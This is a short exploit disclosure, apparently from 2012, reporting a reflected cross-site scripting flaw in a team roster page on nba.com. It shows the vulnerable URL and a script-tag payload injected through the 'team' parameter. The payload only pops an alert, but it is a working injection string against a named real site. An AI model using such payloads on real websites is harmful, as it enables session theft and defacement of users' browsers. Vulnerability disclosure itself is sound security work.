# Exploit Title: nba.com xss
# Date: 22.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php
------------------------------------------------------------------
 
http://www.nba.com/games/gameInfo/teamRoster.html?team=XSS

<script>alert("TayfunBasoglu")</script>
 
http://www.nba.com/games/gameInfo/teamRoster.html?team=<script>alert("TayfunBasoglu")</script>

------------------------------------------------------------------

tayfunbasoglu.blogspot.com